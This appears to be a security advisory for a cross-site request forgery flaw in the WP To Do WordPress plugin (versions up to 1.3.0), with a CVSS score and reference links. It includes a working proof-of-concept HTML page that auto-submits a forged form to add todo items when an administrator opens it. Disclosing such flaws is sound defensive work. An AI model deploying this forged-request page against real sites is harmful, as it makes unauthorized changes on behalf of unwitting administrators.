Description
The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_manage() function. This makes it possible for unauthenticated attackers to add new todo items via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
Severity
4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Affected Version
<= 1.3.0
PoC :
<html>
<!-- Made by eneriiiii<3 / https://x.com/aaillesim -->
<body>
<form action="http://[ASSETS]/wp-admin/admin.php?page=wp-todo" method="POST">
<input type="hidden" name="wptodo_addtask" value="true" />
<input type="hidden" name="wptodo_from" value="1" />
<input type="hidden" name="wptodo_title" value="eneri" />
<input type="hidden" name="wptodo_description" value="eneri" />
<input type="hidden" name="wptodo_deadline" value="2024-04-16" />
<input type="hidden" name="wptodo_for" value="2" />
<input type="hidden" name="wptodo_status" value="1" />
<input type="hidden" name="wptodo_priority" value="4" />
<input type="hidden" name="wptodo_notify" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Reference
- https://plugins.trac.wordpress.org/browser/wp-todo/trunk/inc/Base/Model.php#L273
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-todo/wp-to-do-130-cross-site-request-forgery-via-wptodo-manage